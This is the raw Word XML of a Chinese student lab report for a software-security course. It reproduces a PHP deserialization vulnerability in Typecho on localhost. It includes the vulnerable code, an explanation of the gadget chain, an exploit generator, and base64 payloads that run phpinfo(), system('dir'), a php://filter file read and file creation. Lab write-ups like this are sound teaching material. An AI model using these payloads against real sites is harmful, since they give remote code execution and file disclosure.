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 w:firstLine="2880" w:firstLineChars="900"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"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color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>《软件安全》实验报告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right="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">姓名：曹瑜 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="00000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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>学号：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/>
        </w:rPr>
        <w:t xml:space="preserve">2212794 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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>班级：密码科学与技术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0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验名称：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复现反序列化漏洞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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验要求：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复现12.2.3中的反序列化漏洞，并执行其他的系统命令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rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验过程：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rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000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/*typecho.php*/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&lt;?php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class Typecho_Db{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public function __construct($adapterName){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$adapterName = 'Typecho_Db_Adapter_' . $adapterName;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class Typecho_Feed{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private $item;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public function __toString(){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$this-&gt;item['author']-&gt;screenName;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class Typecho_Request{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private $_params = array();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private $_filter = array();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public function __get($key)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return $this-&gt;get($key);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public function get($key, $default = NULL)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switch (true) {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case isset($this-&gt;_params[$key]):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$value = $this-&gt;_params[$key];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default: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$value = $default;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$value = !is_array($value) &amp;&amp; strlen($value) &gt; 0 ? $value : $default;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return $this-&gt;_applyFilter($value);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private function _applyFilter($value)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if ($this-&gt;_filter) {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foreach ($this-&gt;_filter as $filter) {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$value = is_array($value) ? array_map($filter, $value) :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call_user_func($filter, $value);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$this-&gt;_filter = array();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return $value;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$config = unserialize(base64_decode($_GET['__typecho_config']));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$db = new Typecho_Db($config['adapter']);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该web应用存在一个潜在的反序列化漏洞，具体表现在它允许通过$_GET['__typecho_config']参数接收并反序列化用户输入的对象。由于unserialize()函数的参数可控，这成为了漏洞的入口点。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程序内部，Typecho_Db类的实例被创建，其构造函数接收了通过反序列化得到的$config对象。值得注意的是，在PHP中，当一个对象被当做字符串处理时，如果该对象所属的类定义了__toString()方法，则该方法会被自动调用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局搜索发现，Typecho_Feed类定义了__toString()方法，该方法在内部访问了私有变量$item['author']的screenName属性。然而，如果$item['author']是一个对象，并且该对象没有screenName属性，那么PHP会尝试调用该对象的__get()方法（如果该方法存在）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恰好，在Typecho_Request类中定义了__get()方法，这个方法会调用get()方法，而get()方法内部又调用了_applyFilter()方法。_applyFilter()方法使用了call_user_func()函数（或类似的函数，如call_user_func_array()），该函数允许动态调用用户指定的函数。在_applyFilter()中，$filter和$value参数都可以被用户控制，因此它们可以被用来执行任意的系统命令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通过这一系列的调用链，攻击者可以构造一个恶意的输入，通过$_GET['__typecho_config']参数传入，导致unserialize()函数被调用，进而触发Typecho_Feed类的__toString()方法，然后由于$item['author']被设置为一个特定对象（该对象没有screenName属性但定义了__get()方法），最终导致Typecho_Request类的__get()和get()方法被调用，并进一步触发_applyFilter()方法执行任意系统命令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根据上述思路，写出对应的利用代码：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/*exp.php*/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&lt;?php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class Typecho_Feed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private $item;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public function __construct(){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$this-&gt;item = array(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'author' =&gt; new Typecho_Request(),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class Typecho_Request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private $_params = array();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private $_filter = array();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public function __construct(){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$this-&gt;_params['screenName'] = 'phpinfo()';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$this-&gt;_filter[0] = 'assert';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$exp = array(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'adapter' =&gt; new Typecho_Feed()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echo base64_encode(serialize($exp));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上述代码中用到了 </w:t>
      </w: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PHP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assert()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函数，如果该函数的参数是字符串，那么该字符串会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被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assert()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当做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PHP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代码执行，这一点和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PHP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一句话木马常用的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eval()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函数有相似之处。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phpinfo();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便是我们执行的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PHP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代码，如果想要执行系统命令，将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phpinfo();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替换为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system(‘ls’);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即可，注意最后有一个分号。访问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exp.php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便可以获得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payload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，通过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get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请求的方式传递给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typecho.php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后，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phpinfo()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成功执行。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0" distR="0">
            <wp:extent cx="2964815" cy="2703195"/>
            <wp:effectExtent l="0" t="0" r="698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l="14065" t="12192" r="21869" b="-429"/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访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://127.0.0.1/exp.php" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://127.0.0.1/exp.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjE0OiJzeXN0ZW0ooa5sc6GvKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19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宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>再通过get请求的方式传递给typecho.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>27.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>typecho.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>?__typecho_config=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjE0OiJzeXN0ZW0ooa5sc6GvKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19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如下图phpinfo()成功执行：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06770" cy="2120900"/>
            <wp:effectExtent l="0" t="0" r="6350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l="723" t="21764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测试系统命令：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system(”dir”)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查看页面 payload: YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjE0OiJzeXN0ZW0oImRpciIpOyI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo1OiJhc3NlciI7fX19fX0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FandolSong-Regular-Identity-H" w:hAnsi="FandolSong-Regular-Identity-H" w:eastAsia="FandolSong-Regular-Identity-H" w:cs="FandolSong-Regular-Identity-H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再进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FandolSong-Regular-Identity-H" w:hAnsi="FandolSong-Regular-Identity-H" w:eastAsia="FandolSong-Regular-Identity-H" w:cs="FandolSong-Regular-Identity-H"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>本地文件包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="FandolSong-Regular-Identity-H" w:hAnsi="FandolSong-Regular-Identity-H" w:eastAsia="FandolSong-Regular-Identity-H" w:cs="FandolSong-Regular-Identity-H"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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FandolSong-Regular-Identity-H" w:hAnsi="FandolSong-Regular-Identity-H" w:eastAsia="FandolSong-Regular-Identity-H" w:cs="FandolSong-Regular-Identity-H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457700" cy="758190"/>
            <wp:effectExtent l="0" t="0" r="7620" b="381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t="27743" r="404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payload为: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YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVj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aG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3Qi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OjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5O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YW1lIjtzOjY5OiJpbmNsdWRlICJwaHA6Ly9maWx0ZXIvcmVhZD1jb252ZXJ0LmJhc2U2NC1l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bmNvZGUvcmVzb3VyY2U9aW5kZXgucGhwIjsiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9m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aWx0ZXIiO2E6MTp7aTowO3M6NToiYXNzZXIiO319fX19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将得到的页面用base64进行解密：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得到www 目录下的 index 源码；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0" distR="0">
            <wp:extent cx="4528185" cy="1360170"/>
            <wp:effectExtent l="0" t="0" r="1333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rcRect l="15049" t="29389" r="8732" b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0" distR="0">
            <wp:extent cx="4818380" cy="15728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rcRect l="2721" r="5923" b="7124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复现完成，实现其他系统命令（创建文本文件）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将phpinfo();替换为fopen(\'newfile.txt\', \'w\');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把exe.php文件中代码句 $this-&gt;_params['screenName'] = 'phpinfo()'; 中的 phpinfo() 替换为 fopen(\'newfile.txt\', \'w\');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即实现在exe.php目录下产生一个名为 newfile.txt 的文本文件；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然后再通过重复的操作，提取这条新命令的 payload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新payload如下： </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjI2OiJmb3BlbignbmV3ZmlsZS50eHQnLCAndycpOyI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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然后再通过GET请求方式把其传入到typecho.php文件，在浏览器中输入URL再摁下回车运行发现无报错，说明运行成功；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0" distR="0">
            <wp:extent cx="4956175" cy="870585"/>
            <wp:effectExtent l="0" t="0" r="12065" b="133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rcRect r="4107"/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宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最后到对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>目录：C:\PHPnow-1.5.6\htdocs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>观察</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>观察到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>产生一个newfile.txt文本文件，证明命令执行成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs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975360" cy="95250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left"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>心得体会：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在了解了php反序列化漏洞的原理后，成功复现了课本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>12.2.3中的反序列化漏洞，且实现了其他系统命令（创建文本文件），结合课本示例进行分析，对php反序列化漏洞有了更深刻的理解，强化了自己漏洞挖掘的能力；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right="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="00000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FandolSong-Regula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2E471DD7"/>
    <w:rsid w:val="0729554C"/>
    <w:rsid w:val="09E63240"/>
    <w:rsid w:val="0BFE45B1"/>
    <w:rsid w:val="0C0B13B7"/>
    <w:rsid w:val="0C3E353A"/>
    <w:rsid w:val="181B0BD3"/>
    <w:rsid w:val="18F876A4"/>
    <w:rsid w:val="29986528"/>
    <w:rsid w:val="2C9E14F0"/>
    <w:rsid w:val="2CA668B8"/>
    <w:rsid w:val="2E471DD7"/>
    <w:rsid w:val="34D30483"/>
    <w:rsid w:val="374D73FC"/>
    <w:rsid w:val="3810197F"/>
    <w:rsid w:val="432C6302"/>
    <w:rsid w:val="44641089"/>
    <w:rsid w:val="458748B1"/>
    <w:rsid w:val="4D007DBC"/>
    <w:rsid w:val="5A47527D"/>
    <w:rsid w:val="64F91794"/>
    <w:rsid w:val="70DF36C1"/>
    <w:rsid w:val="757309F0"/>
    <w:rsid w:val="79E63D12"/>
    <w:rsid w:val="7BAE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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="800000"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="3"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="000080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="6">
    <w:name w:val="cjk"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat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1510</Words>
  <Characters>3415</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3706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2024-03-19T13:41:00Z</dcterms:created>
  <dc:creator>怀.瑾.</dc:creator>
  <cp:lastModifiedBy>怀.瑾.</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-18T14:32:47Z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DC3954B2171A4B678D41CF1E0E940387_11</vt:lpwstr>
  </property>
</Properties>
</file>